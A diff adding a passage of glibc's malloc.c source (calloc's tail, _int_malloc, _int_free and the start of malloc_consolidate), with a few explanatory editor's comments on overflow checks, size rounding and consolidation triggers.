+  INTERNAL_SIZE_T bytes, sz, csz, oldtopsize;
+  void *mem;
+  unsigned long clearsize;
+  unsigned long nclears;
+  INTERNAL_SIZE_T *d;
+
+  /* size_t is unsigned so the behavior on overflow is defined.  */
+  bytes = n * elem_size;
+#define HALF_INTERNAL_SIZE_T \
+  (((INTERNAL_SIZE_T) 1) << (8 * sizeof (INTERNAL_SIZE_T) / 2))
+  if (__builtin_expect ((n | elem_size) >= HALF_INTERNAL_SIZE_T, 0))
+    {
+      if (elem_size != 0 && bytes / elem_size != n)
+        {
+          __set_errno (ENOMEM);
+          return 0;
+        }
+    }
+
+  void *(*hook) (size_t, const void *) =
+    atomic_forced_read (__malloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    {
+      sz = bytes;
+      mem = (*hook)(sz, RETURN_ADDRESS (0));
+      if (mem == 0)
+        return 0;
+
+      return memset (mem, 0, sz);
+    }
+
+  sz = bytes;
+
+  MAYBE_INIT_TCACHE ();
+
+  if (SINGLE_THREAD_P)
+    av = &main_arena;
+  else
+    arena_get (av, sz);
+
+  if (av)
+    {
+      /* Check if we hand out the top chunk, in which case there may be no
+	 need to clear. */
+#if MORECORE_CLEARS
+      oldtop = top (av);
+      oldtopsize = chunksize (top (av));
+# if MORECORE_CLEARS < 2
+      /* Only newly allocated memory is guaranteed to be cleared.  */
+      if (av == &main_arena &&
+	  oldtopsize < mp_.sbrk_base + av->max_system_mem - (char *) oldtop)
+	oldtopsize = (mp_.sbrk_base + av->max_system_mem - (char *) oldtop);
+# endif
+      if (av != &main_arena)
+	{
+	  heap_info *heap = heap_for_ptr (oldtop);
+	  if (oldtopsize < (char *) heap + heap->mprotect_size - (char *) oldtop)
+	    oldtopsize = (char *) heap + heap->mprotect_size - (char *) oldtop;
+	}
+#endif
+    }
+  else
+    {
+      /* No usable arenas.  */
+      oldtop = 0;
+      oldtopsize = 0;
+    }
+  mem = _int_malloc (av, sz);
+
+  assert (!mem || chunk_is_mmapped (mem2chunk (mem)) ||
+          av == arena_for_chunk (mem2chunk (mem)));
+
+  if (!SINGLE_THREAD_P)
+    {
+      if (mem == 0 && av != NULL)
+	{
+	  LIBC_PROBE (memory_calloc_retry, 1, sz);
+	  av = arena_get_retry (av, sz);
+	  mem = _int_malloc (av, sz);
+	}
+
+      if (av != NULL)
+	__libc_lock_unlock (av->mutex);
+    }
+
+  /* Allocation failed even after a retry.  */
+  if (mem == 0)
+    return 0;
+
+  p = mem2chunk (mem);
+
+  /* Two optional cases in which clearing is not necessary */
+  if (chunk_is_mmapped (p))
+    {
+      if (__builtin_expect (perturb_byte, 0))
+        return memset (mem, 0, sz);
+
+      return mem;
+    }
+
+  csz = chunksize (p);
+
+#if MORECORE_CLEARS
+  if (perturb_byte == 0 && (p == oldtop && csz > oldtopsize))
+    {
+      /* clear only the bytes from non-freshly-sbrked memory */
+      csz = oldtopsize;
+    }
+#endif
+
+  /* Unroll clear of <= 36 bytes (72 if 8byte sizes).  We know that
+     contents have an odd number of INTERNAL_SIZE_T-sized words;
+     minimally 3.  */
+  d = (INTERNAL_SIZE_T *) mem;
+  clearsize = csz - SIZE_SZ;
+  nclears = clearsize / sizeof (INTERNAL_SIZE_T);
+  assert (nclears >= 3);
+
+  if (nclears > 9)
+    return memset (d, 0, clearsize);
+
+  else
+    {
+      *(d + 0) = 0;
+      *(d + 1) = 0;
+      *(d + 2) = 0;
+      if (nclears > 4)
+        {
+          *(d + 3) = 0;
+          *(d + 4) = 0;
+          if (nclears > 6)
+            {
+              *(d + 5) = 0;
+              *(d + 6) = 0;
+              if (nclears > 8)
+                {
+                  *(d + 7) = 0;
+                  *(d + 8) = 0;
+                }
+            }
+        }
+    }
+
+  return mem;
+}
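+
+/* [Editor's sketch]  The HALF_INTERNAL_SIZE_T test above is the calloc
+   overflow guard: the n * elem_size product is re-checked by division only
+   when one of the operands is large enough for the multiplication to wrap.
+   From user code:  */
+#if 0   /* illustrative only, not part of glibc */
+#include <errno.h>
+#include <stdio.h>
+#include <stdlib.h>
+
+int
+main (void)
+{
+  /* ((SIZE_MAX / 4) + 1) * 8 wraps around size_t, so calloc must refuse
+     the request instead of returning an undersized buffer.  */
+  void *p = calloc ((size_t) -1 / 4 + 1, 8);
+  printf ("p=%p errno=%d (ENOMEM=%d)\n", p, errno, ENOMEM);  /* p == NULL */
+  return 0;
+}
+#endif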
+
+/*
+   ------------------------------ malloc ------------------------------
+ */
+
+static void *
+_int_malloc (mstate av, size_t bytes)
+{
+  INTERNAL_SIZE_T nb;               /* normalized request size */
+  unsigned int idx;                 /* associated bin index */
+  mbinptr bin;                      /* associated bin */
+
+  mchunkptr victim;                 /* inspected/selected chunk */
+  INTERNAL_SIZE_T size;             /* its size */
+  int victim_index;                 /* its bin index */
+
+  mchunkptr remainder;              /* remainder from a split */
+  unsigned long remainder_size;     /* its size */
+
+  unsigned int block;               /* bit map traverser */
+  unsigned int bit;                 /* bit map traverser */
+  unsigned int map;                 /* current word of binmap */
+
+  mchunkptr fwd;                    /* misc temp for linking */
+  mchunkptr bck;                    /* misc temp for linking */
+
+#if USE_TCACHE
+  size_t tcache_unsorted_count;	    /* count of unsorted chunks processed */
+#endif
+
+  /*
+     Convert request size to internal form by adding SIZE_SZ bytes
+     overhead plus possibly more to obtain necessary alignment and/or
+     to obtain a size of at least MINSIZE, the smallest allocatable
+     size. Also, checked_request2size traps (returning 0) request sizes
+     that are so large that they wrap around zero when padded and
+     aligned.
+   */
+
+  checked_request2size (bytes, nb);
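+
+  /* [Editor's note]  Worked example, assuming x86-64 (SIZE_SZ 8,
+     MALLOC_ALIGNMENT 16, MINSIZE 32): requests of 0..24 bytes all become
+     nb = 32 (0x20), e.g. (24 + 8 + 15) & ~15 == 32, while a 25-byte
+     request already needs nb = 48 (0x30).  */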
+
+  /* There are no usable arenas.  Fall back to sysmalloc to get a chunk from
+     mmap.  */
+  if (__glibc_unlikely (av == NULL))
+    {
+      void *p = sysmalloc (nb, av);
+      if (p != NULL)
+	alloc_perturb (p, bytes);
+      return p;
+    }
+
+  /*
+     If the size qualifies as a fastbin, first check corresponding bin.
+     This code is safe to execute even if av is not yet initialized, so we
+     can try it without checking, which saves some time on this fast path.
+   */
+
+#define REMOVE_FB(fb, victim, pp)			\
+  do							\
+    {							\
+      victim = pp;					\
+      if (victim == NULL)				\
+	break;						\
+    }							\
+  while ((pp = catomic_compare_and_exchange_val_acq (fb, victim->fd, victim)) \
+	 != victim);					\
+
+  if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ()))
+    {
+      idx = fastbin_index (nb);
+      mfastbinptr *fb = &fastbin (av, idx);
+      mchunkptr pp;
+      victim = *fb;
+
+      if (victim != NULL)
+	{
+	  if (SINGLE_THREAD_P)
+	    *fb = victim->fd;
+	  else
+	    REMOVE_FB (fb, pp, victim);
+	  if (__glibc_likely (victim != NULL))
+	    {
+	      size_t victim_idx = fastbin_index (chunksize (victim));
+	      if (__builtin_expect (victim_idx != idx, 0))
+		malloc_printerr ("malloc(): memory corruption (fast)");
+	      check_remalloced_chunk (av, victim, nb);
+#if USE_TCACHE
+	      /* While we're here, if we see other chunks of the same size,
+		 stash them in the tcache.  */
+	      size_t tc_idx = csize2tidx (nb);
+	      if (tcache && tc_idx < mp_.tcache_bins)
+		{
+		  mchunkptr tc_victim;
+
+		  /* While bin not empty and tcache not full, copy chunks.  */
+		  while (tcache->counts[tc_idx] < mp_.tcache_count
+			 && (tc_victim = *fb) != NULL)
+		    {
+		      if (SINGLE_THREAD_P)
+			*fb = tc_victim->fd;
+		      else
+			{
+			  REMOVE_FB (fb, pp, tc_victim);
+			  if (__glibc_unlikely (tc_victim == NULL))
+			    break;
+			}
+		      tcache_put (tc_victim, tc_idx);
+		    }
+		}
+#endif
+	      void *p = chunk2mem (victim);
+	      alloc_perturb (p, bytes);
+	      return p;
+	    }
+	}
+    }
+
+  /*
+     If a small request, check regular bin.  Since these "smallbins"
+     hold one size each, no searching within bins is necessary.
+     (For a large request, we need to wait until unsorted chunks are
+     processed to find best fit. But for small ones, fits are exact
+     anyway, so we can check now, which is faster.)
+   */
+
+  if (in_smallbin_range (nb))
+    {
+      idx = smallbin_index (nb);
+      bin = bin_at (av, idx);
+
+      if ((victim = last (bin)) != bin)
+        {
+          bck = victim->bk;
+	  if (__glibc_unlikely (bck->fd != victim))
+	    malloc_printerr ("malloc(): smallbin double linked list corrupted");
+          set_inuse_bit_at_offset (victim, nb);
+          bin->bk = bck;
+          bck->fd = bin;
+
+          if (av != &main_arena)
+	    set_non_main_arena (victim);
+          check_malloced_chunk (av, victim, nb);
+#if USE_TCACHE
+	  /* While we're here, if we see other chunks of the same size,
+	     stash them in the tcache.  */
+	  size_t tc_idx = csize2tidx (nb);
+	  if (tcache && tc_idx < mp_.tcache_bins)
+	    {
+	      mchunkptr tc_victim;
+
+	      /* While bin not empty and tcache not full, copy chunks over.  */
+	      while (tcache->counts[tc_idx] < mp_.tcache_count
+		     && (tc_victim = last (bin)) != bin)
+		{
+		  if (tc_victim != 0)
+		    {
+		      bck = tc_victim->bk;
+		      set_inuse_bit_at_offset (tc_victim, nb);
+		      if (av != &main_arena)
+			set_non_main_arena (tc_victim);
+		      bin->bk = bck;
+		      bck->fd = bin;
+
+		      tcache_put (tc_victim, tc_idx);
+	            }
+		}
+	    }
+#endif
+          void *p = chunk2mem (victim);
+          alloc_perturb (p, bytes);
+          return p;
+        }
+    }
+
+  /*
+     If this is a large request, consolidate fastbins before continuing.
+     While it might look excessive to kill all fastbins before
+     even seeing if there is space available, this avoids
+     fragmentation problems normally associated with fastbins.
+     Also, in practice, programs tend to have runs of either small or
+     large requests, but less often mixtures, so consolidation is not
+     invoked all that often in most programs. And the programs in which
+     it is called frequently would otherwise tend to fragment.
+   */
+
+  else
+    {
+      idx = largebin_index (nb);
+      if (atomic_load_relaxed (&av->have_fastchunks))
+        malloc_consolidate (av);
+    }
+
+  /*
+     Process recently freed or remaindered chunks, taking one only if
+     it is an exact fit, or, if this is a small request, the chunk is the remainder from
+     the most recent non-exact fit.  Place other traversed chunks in
+     bins.  Note that this step is the only place in any routine where
+     chunks are placed in bins.
+
+     The outer loop here is needed because we might not realize until
+     near the end of malloc that we should have consolidated, so must
+     do so and retry. This happens at most once, and only when we would
+     otherwise need to expand memory to service a "small" request.
+   */
+
+#if USE_TCACHE
+  INTERNAL_SIZE_T tcache_nb = 0;
+  size_t tc_idx = csize2tidx (nb);
+  if (tcache && tc_idx < mp_.tcache_bins)
+    tcache_nb = nb;
+  int return_cached = 0;
+
+  tcache_unsorted_count = 0;
+#endif
+
+  for (;; )
+    {
+      int iters = 0;
+      while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
+        {
+          bck = victim->bk;
+          if (__builtin_expect (chunksize_nomask (victim) <= 2 * SIZE_SZ, 0)
+              || __builtin_expect (chunksize_nomask (victim)
+				   > av->system_mem, 0))
+            malloc_printerr ("malloc(): memory corruption");
+          size = chunksize (victim);
+
+          /*
+             If a small request, try to use last remainder if it is the
+             only chunk in unsorted bin.  This helps promote locality for
+             runs of consecutive small requests. This is the only
+             exception to best-fit, and applies only when there is
+             no exact fit for a small chunk.
+           */
+
+          if (in_smallbin_range (nb) &&
+              bck == unsorted_chunks (av) &&
+              victim == av->last_remainder &&
+              (unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+            {
+              /* split and reattach remainder */
+              remainder_size = size - nb;
+              remainder = chunk_at_offset (victim, nb);
+              unsorted_chunks (av)->bk = unsorted_chunks (av)->fd = remainder;
+              av->last_remainder = remainder;
+              remainder->bk = remainder->fd = unsorted_chunks (av);
+              if (!in_smallbin_range (remainder_size))
+                {
+                  remainder->fd_nextsize = NULL;
+                  remainder->bk_nextsize = NULL;
+                }
+
+              set_head (victim, nb | PREV_INUSE |
+                        (av != &main_arena ? NON_MAIN_ARENA : 0));
+              set_head (remainder, remainder_size | PREV_INUSE);
+              set_foot (remainder, remainder_size);
+
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+
+          /* remove from unsorted list */
+          if (__glibc_unlikely (bck->fd != victim))
+            malloc_printerr ("malloc(): corrupted unsorted chunks 3");
+          unsorted_chunks (av)->bk = bck;
+          bck->fd = unsorted_chunks (av);
+
+          /* Take now instead of binning if exact fit */
+
+          if (size == nb)
+            {
+              set_inuse_bit_at_offset (victim, size);
+              if (av != &main_arena)
+		set_non_main_arena (victim);
+#if USE_TCACHE
+	      /* Fill cache first, return to user only if cache fills.
+		 We may return one of these chunks later.  */
+	      if (tcache_nb
+		  && tcache->counts[tc_idx] < mp_.tcache_count)
+		{
+		  tcache_put (victim, tc_idx);
+		  return_cached = 1;
+		  continue;
+		}
+	      else
+		{
+#endif
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+#if USE_TCACHE
+		}
+#endif
+            }
+
+          /* place chunk in bin */
+
+          if (in_smallbin_range (size))
+            {
+              victim_index = smallbin_index (size);
+              bck = bin_at (av, victim_index);
+              fwd = bck->fd;
+            }
+          else
+            {
+              victim_index = largebin_index (size);
+              bck = bin_at (av, victim_index);
+              fwd = bck->fd;
+
+              /* maintain large bins in sorted order */
+              if (fwd != bck)
+                {
+                  /* Or with inuse bit to speed comparisons */
+                  size |= PREV_INUSE;
+                  /* if smaller than smallest, bypass loop below */
+                  assert (chunk_main_arena (bck->bk));
+                  if ((unsigned long) (size)
+		      < (unsigned long) chunksize_nomask (bck->bk))
+                    {
+                      fwd = bck;
+                      bck = bck->bk;
+
+                      victim->fd_nextsize = fwd->fd;
+                      victim->bk_nextsize = fwd->fd->bk_nextsize;
+                      fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
+                    }
+                  else
+                    {
+                      assert (chunk_main_arena (fwd));
+                      while ((unsigned long) size < chunksize_nomask (fwd))
+                        {
+                          fwd = fwd->fd_nextsize;
+			  assert (chunk_main_arena (fwd));
+                        }
+
+                      if ((unsigned long) size
+			  == (unsigned long) chunksize_nomask (fwd))
+                        /* Always insert in the second position.  */
+                        fwd = fwd->fd;
+                      else
+                        {
+                          victim->fd_nextsize = fwd;
+                          victim->bk_nextsize = fwd->bk_nextsize;
+                          fwd->bk_nextsize = victim;
+                          victim->bk_nextsize->fd_nextsize = victim;
+                        }
+                      bck = fwd->bk;
+                    }
+                }
+              else
+                victim->fd_nextsize = victim->bk_nextsize = victim;
+            }
+
+          mark_bin (av, victim_index);
+          victim->bk = bck;
+          victim->fd = fwd;
+          fwd->bk = victim;
+          bck->fd = victim;
+
+#if USE_TCACHE
+      /* If we've processed as many chunks as we're allowed while
+	 filling the cache, return one of the cached ones.  */
+      ++tcache_unsorted_count;
+      if (return_cached
+	  && mp_.tcache_unsorted_limit > 0
+	  && tcache_unsorted_count > mp_.tcache_unsorted_limit)
+	{
+	  return tcache_get (tc_idx);
+	}
+#endif
+
+#define MAX_ITERS       10000
+          if (++iters >= MAX_ITERS)
+            break;
+        }
+
+#if USE_TCACHE
+      /* If all the small chunks we found ended up cached, return one now.  */
+      if (return_cached)
+	{
+	  return tcache_get (tc_idx);
+	}
+#endif
+
+      /*
+         If a large request, scan through the chunks of current bin in
+         sorted order to find smallest that fits.  Use the skip list for this.
+       */
+
+      if (!in_smallbin_range (nb))
+        {
+          bin = bin_at (av, idx);
+
+          /* skip scan if empty or largest chunk is too small */
+          if ((victim = first (bin)) != bin
+	      && (unsigned long) chunksize_nomask (victim)
+	        >= (unsigned long) (nb))
+            {
+              victim = victim->bk_nextsize;
+              while (((unsigned long) (size = chunksize (victim)) <
+                      (unsigned long) (nb)))
+                victim = victim->bk_nextsize;
+
+              /* Avoid removing the first entry for a size so that the skip
+                 list does not have to be rerouted.  */
+              if (victim != last (bin)
+		  && chunksize_nomask (victim)
+		    == chunksize_nomask (victim->fd))
+                victim = victim->fd;
+
+              remainder_size = size - nb;
+              unlink (av, victim, bck, fwd);
+
+              /* Exhaust */
+              if (remainder_size < MINSIZE)
+                {
+                  set_inuse_bit_at_offset (victim, size);
+                  if (av != &main_arena)
+		    set_non_main_arena (victim);
+                }
+              /* Split */
+              else
+                {
+                  remainder = chunk_at_offset (victim, nb);
+                  /* We cannot assume the unsorted list is empty and therefore
+                     have to perform a complete insert here.  */
+                  bck = unsorted_chunks (av);
+                  fwd = bck->fd;
+		  if (__glibc_unlikely (fwd->bk != bck))
+		    malloc_printerr ("malloc(): corrupted unsorted chunks");
+                  remainder->bk = bck;
+                  remainder->fd = fwd;
+                  bck->fd = remainder;
+                  fwd->bk = remainder;
+                  if (!in_smallbin_range (remainder_size))
+                    {
+                      remainder->fd_nextsize = NULL;
+                      remainder->bk_nextsize = NULL;
+                    }
+                  set_head (victim, nb | PREV_INUSE |
+                            (av != &main_arena ? NON_MAIN_ARENA : 0));
+                  set_head (remainder, remainder_size | PREV_INUSE);
+                  set_foot (remainder, remainder_size);
+                }
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+
+      /*
+         Search for a chunk by scanning bins, starting with next largest
+         bin. This search is strictly by best-fit; i.e., the smallest
+         (with ties going to approximately the least recently used) chunk
+         that fits is selected.
+
+         The bitmap avoids needing to check that most blocks are nonempty.
+         The particular case of skipping all bins during warm-up phases
+         when no chunks have been returned yet is faster than it might look.
+       */
+
+      ++idx;
+      bin = bin_at (av, idx);
+      block = idx2block (idx);
+      map = av->binmap[block];
+      bit = idx2bit (idx);
+
+      for (;; )
+        {
+          /* Skip rest of block if there are no more set bits in this block.  */
+          if (bit > map || bit == 0)
+            {
+              do
+                {
+                  if (++block >= BINMAPSIZE) /* out of bins */
+                    goto use_top;
+                }
+              while ((map = av->binmap[block]) == 0);
+
+              bin = bin_at (av, (block << BINMAPSHIFT));
+              bit = 1;
+            }
+
+          /* Advance to bin with set bit. There must be one. */
+          while ((bit & map) == 0)
+            {
+              bin = next_bin (bin);
+              bit <<= 1;
+              assert (bit != 0);
+            }
+
+          /* Inspect the bin. It is likely to be non-empty */
+          victim = last (bin);
+
+          /*  If a false alarm (empty bin), clear the bit. */
+          if (victim == bin)
+            {
+              av->binmap[block] = map &= ~bit; /* Write through */
+              bin = next_bin (bin);
+              bit <<= 1;
+            }
+
+          else
+            {
+              size = chunksize (victim);
+
+              /*  We know the first chunk in this bin is big enough to use. */
+              assert ((unsigned long) (size) >= (unsigned long) (nb));
+
+              remainder_size = size - nb;
+
+              /* unlink */
+              unlink (av, victim, bck, fwd);
+
+              /* Exhaust */
+              if (remainder_size < MINSIZE)
+                {
+                  set_inuse_bit_at_offset (victim, size);
+                  if (av != &main_arena)
+		    set_non_main_arena (victim);
+                }
+
+              /* Split */
+              else
+                {
+                  remainder = chunk_at_offset (victim, nb);
+
+                  /* We cannot assume the unsorted list is empty and therefore
+                     have to perform a complete insert here.  */
+                  bck = unsorted_chunks (av);
+                  fwd = bck->fd;
+		  if (__glibc_unlikely (fwd->bk != bck))
+		    malloc_printerr ("malloc(): corrupted unsorted chunks 2");
+                  remainder->bk = bck;
+                  remainder->fd = fwd;
+                  bck->fd = remainder;
+                  fwd->bk = remainder;
+
+                  /* advertise as last remainder */
+                  if (in_smallbin_range (nb))
+                    av->last_remainder = remainder;
+                  if (!in_smallbin_range (remainder_size))
+                    {
+                      remainder->fd_nextsize = NULL;
+                      remainder->bk_nextsize = NULL;
+                    }
+                  set_head (victim, nb | PREV_INUSE |
+                            (av != &main_arena ? NON_MAIN_ARENA : 0));
+                  set_head (remainder, remainder_size | PREV_INUSE);
+                  set_foot (remainder, remainder_size);
+                }
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+
+    use_top:
+      /*
+         If large enough, split off the chunk bordering the end of memory
+         (held in av->top). Note that this is in accord with the best-fit
+         search rule.  In effect, av->top is treated as larger (and thus
+         less well fitting) than any other available chunk since it can
+         be extended to be as large as necessary (up to system
+         limitations).
+
+         We require that av->top always exists (i.e., has size >=
+         MINSIZE) after initialization, so if it would otherwise be
+         exhausted by current request, it is replenished. (The main
+         reason for ensuring it exists is that we may need MINSIZE space
+         to put in fenceposts in sysmalloc.)
+       */
+
+      victim = av->top;
+      size = chunksize (victim);
+
+      if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+        {
+          remainder_size = size - nb;
+          remainder = chunk_at_offset (victim, nb);
+          av->top = remainder;
+          set_head (victim, nb | PREV_INUSE |
+                    (av != &main_arena ? NON_MAIN_ARENA : 0));
+          set_head (remainder, remainder_size | PREV_INUSE);
+
+          check_malloced_chunk (av, victim, nb);
+          void *p = chunk2mem (victim);
+          alloc_perturb (p, bytes);
+          return p;
+        }
+
+      /* When we are using atomic ops to free fast chunks we can get
+         here for all block sizes.  */
+      else if (atomic_load_relaxed (&av->have_fastchunks))
+        {
+          malloc_consolidate (av);
+          /* restore original bin index */
+          if (in_smallbin_range (nb))
+            idx = smallbin_index (nb);
+          else
+            idx = largebin_index (nb);
+        }
+
+      /*
+         Otherwise, relay to handle system-dependent cases
+       */
+      else
+        {
+          void *p = sysmalloc (nb, av);
+          if (p != NULL)
+            alloc_perturb (p, bytes);
+          return p;
+        }
+    }
+}
+
+/*
+   ------------------------------ free ------------------------------
+ */
+
+static void
+_int_free (mstate av, mchunkptr p, int have_lock)
+{
+  INTERNAL_SIZE_T size;        /* its size */
+  mfastbinptr *fb;             /* associated fastbin */
+  mchunkptr nextchunk;         /* next contiguous chunk */
+  INTERNAL_SIZE_T nextsize;    /* its size */
+  int nextinuse;               /* true if nextchunk is used */
+  INTERNAL_SIZE_T prevsize;    /* size of previous contiguous chunk */
+  mchunkptr bck;               /* misc temp for linking */
+  mchunkptr fwd;               /* misc temp for linking */
+
+  size = chunksize (p);
+
+  /* Little security check which won't hurt performance: the
+     allocator never wraps around at the end of the address space.
+     Therefore we can exclude some size values which might appear
+     here by accident or by "design" from some intruder.  */
+  if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0)
+      || __builtin_expect (misaligned_chunk (p), 0))
+    malloc_printerr ("free(): invalid pointer");
+  /* We know that each chunk is at least MINSIZE bytes in size and a
+     multiple of MALLOC_ALIGNMENT.  */
+  if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size)))
+    malloc_printerr ("free(): invalid size");
+
+  check_inuse_chunk(av, p);
+
+#if USE_TCACHE
+  {
+    size_t tc_idx = csize2tidx (size);
+
+    if (tcache
+	&& tc_idx < mp_.tcache_bins
+	&& tcache->counts[tc_idx] < mp_.tcache_count)
+      {
+	tcache_put (p, tc_idx);
+	return;
+      }
+  }
+#endif
+
+  /*
+    If eligible, place chunk on a fastbin so it can be found
+    and used quickly in malloc.
+  */
+
+  if ((unsigned long)(size) <= (unsigned long)(get_max_fast ())
+
+#if TRIM_FASTBINS
+      /*
+	If TRIM_FASTBINS set, don't place chunks
+	bordering top into fastbins
+      */
+      && (chunk_at_offset(p, size) != av->top)
+#endif
+      ) {
+
+    if (__builtin_expect (chunksize_nomask (chunk_at_offset (p, size))
+			  <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (chunksize (chunk_at_offset (p, size))
+			     >= av->system_mem, 0))
+      {
+	bool fail = true;
+	/* We might not have a lock at this point and concurrent modifications
+	   of system_mem might result in a false positive.  Redo the test after
+	   getting the lock.  */
+	if (!have_lock)
+	  {
+	    __libc_lock_lock (av->mutex);
+	    fail = (chunksize_nomask (chunk_at_offset (p, size)) <= 2 * SIZE_SZ
+		    || chunksize (chunk_at_offset (p, size)) >= av->system_mem);
+	    __libc_lock_unlock (av->mutex);
+	  }
+
+	if (fail)
+	  malloc_printerr ("free(): invalid next size (fast)");
+      }
+
+    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
+
+    atomic_store_relaxed (&av->have_fastchunks, true);
+    unsigned int idx = fastbin_index(size);
+    fb = &fastbin (av, idx);
+
+    /* Atomically link P to its fastbin: P->FD = *FB; *FB = P;  */
+    mchunkptr old = *fb, old2;
+
+    if (SINGLE_THREAD_P)
+      {
+	/* Check that the top of the bin is not the record we are going to
+	   add (i.e., double free).  */
+	if (__builtin_expect (old == p, 0))
+	  malloc_printerr ("double free or corruption (fasttop)");
+	p->fd = old;
+	*fb = p;
+      }
+    else
+      do
+	{
+	  /* Check that the top of the bin is not the record we are going to
+	     add (i.e., double free).  */
+	  if (__builtin_expect (old == p, 0))
+	    malloc_printerr ("double free or corruption (fasttop)");
+	  p->fd = old2 = old;
+	}
+      while ((old = catomic_compare_and_exchange_val_rel (fb, p, old2))
+	     != old2);
+
+    /* Check that size of fastbin chunk at the top is the same as
+       size of the chunk that we are adding.  We can dereference OLD
+       only if we have the lock, otherwise it might have already been
+       allocated again.  */
+    if (have_lock && old != NULL
+	&& __builtin_expect (fastbin_index (chunksize (old)) != idx, 0))
+      malloc_printerr ("invalid fastbin entry (free)");
+  }
+
+  /*
+    Consolidate other non-mmapped chunks as they arrive.
+  */
+
+  else if (!chunk_is_mmapped(p)) {
+
+    /* If we're single-threaded, don't lock the arena.  */
+    if (SINGLE_THREAD_P)
+      have_lock = true;
+
+    if (!have_lock)
+      __libc_lock_lock (av->mutex);
+
+    nextchunk = chunk_at_offset(p, size);
+
+    /* Lightweight tests: check whether the block is already the
+       top block.  */
+    if (__glibc_unlikely (p == av->top))
+      malloc_printerr ("double free or corruption (top)");
+    /* Or whether the next chunk is beyond the boundaries of the arena.  */
+    if (__builtin_expect (contiguous (av)
+			  && (char *) nextchunk
+			  >= ((char *) av->top + chunksize(av->top)), 0))
+	malloc_printerr ("double free or corruption (out)");
+    /* Or whether the block is actually not marked used.  */
+    if (__glibc_unlikely (!prev_inuse(nextchunk)))
+      malloc_printerr ("double free or corruption (!prev)");
+
+    nextsize = chunksize(nextchunk);
+    if (__builtin_expect (chunksize_nomask (nextchunk) <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (nextsize >= av->system_mem, 0))
+      malloc_printerr ("free(): invalid next size (normal)");
+
+    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
+
+    /* consolidate backward */
+    if (!prev_inuse(p)) {
+      prevsize = prev_size (p);
+      size += prevsize;
+      p = chunk_at_offset(p, -((long) prevsize));
+      unlink(av, p, bck, fwd);
+    }
+
+    if (nextchunk != av->top) {
+      /* get and clear inuse bit */
+      nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+
+      /* consolidate forward */
+      if (!nextinuse) {
+	unlink(av, nextchunk, bck, fwd);
+	size += nextsize;
+      } else
+	clear_inuse_bit_at_offset(nextchunk, 0);
+
+      /*
+	Place the chunk in unsorted chunk list. Chunks are
+	not placed into regular bins until after they have
+	been given one chance to be used in malloc.
+      */
+
+      bck = unsorted_chunks(av);
+      fwd = bck->fd;
+      if (__glibc_unlikely (fwd->bk != bck))
+	malloc_printerr ("free(): corrupted unsorted chunks");
+      p->fd = fwd;
+      p->bk = bck;
+      if (!in_smallbin_range(size))
+	{
+	  p->fd_nextsize = NULL;
+	  p->bk_nextsize = NULL;
+	}
+      bck->fd = p;
+      fwd->bk = p;
+
+      set_head(p, size | PREV_INUSE);
+      set_foot(p, size);
+
+      check_free_chunk(av, p);
+    }
+
+    /*
+      If the chunk borders the current high end of memory,
+      consolidate into top
+    */
+
+    else {
+      size += nextsize;
+      set_head(p, size | PREV_INUSE);
+      av->top = p;
+      check_chunk(av, p);
+    }
+
+    /*
+      If freeing a large space, consolidate possibly-surrounding
+      chunks. Then, if the total unused topmost memory exceeds trim
+      threshold, ask malloc_trim to reduce top.
+
+      Unless max_fast is 0, we don't know if there are fastbins
+      bordering top, so we cannot tell for sure whether threshold
+      has been reached unless fastbins are consolidated.  But we
+      don't want to consolidate on each free.  As a compromise,
+      consolidation is performed if FASTBIN_CONSOLIDATION_THRESHOLD
+      is reached.
+    */
+
+    if ((unsigned long)(size) >= FASTBIN_CONSOLIDATION_THRESHOLD) {
+      if (atomic_load_relaxed (&av->have_fastchunks))
+	malloc_consolidate(av);
+
+      if (av == &main_arena) {
+#ifndef MORECORE_CANNOT_TRIM
+	if ((unsigned long)(chunksize(av->top)) >=
+	    (unsigned long)(mp_.trim_threshold))
+	  systrim(mp_.top_pad, av);
+#endif
+      } else {
+	/* Always try heap_trim(), even if the top chunk is not
+	   large, because the corresponding heap might go away.  */
+	heap_info *heap = heap_for_ptr(top(av));
+
+	assert(heap->ar_ptr == av);
+	heap_trim(heap, mp_.top_pad);
+      }
+    }
+
+    if (!have_lock)
+      __libc_lock_unlock (av->mutex);
+  }
+  /*
+    If the chunk was allocated via mmap, release via munmap().
+  */
+
+  else {
+    munmap_chunk (p);
+  }
+}
+
+/*
+  ------------------------- malloc_consolidate -------------------------
+
+  malloc_consolidate is a specialized version of free() that tears
+  down chunks held in fastbins.  Free itself cannot be used for this
+  purpose since, among other things, it might place chunks back onto
+  fastbins.  So, instead, we need to use a minor variant of the same
+  code.
+*/
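+
+/* [Editor's note: descriptive addition, not part of upstream glibc.]
+   As seen elsewhere in this file, consolidation is triggered from
+   free() once a freed chunk reaches FASTBIN_CONSOLIDATION_THRESHOLD,
+   from mallopt() before max_fast is changed, and from _int_malloc()
+   when a large request arrives while fastbins are populated.  */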
+
+static void malloc_consolidate(mstate av)
+{
+  mfastbinptr*    fb;                 /* current fastbin being consolidated */
+  mfastbinptr*    maxfb;              /* last fastbin (for loop control) */
+  mchunkptr       p;                  /* current chunk being consolidated */
+  mchunkptr       nextp;              /* next chunk to consolidate */
+  mchunkptr       unsorted_bin;       /* bin header */
+  mchunkptr       first_unsorted;     /* chunk to link to */
+
+  /* These have same use as in free() */
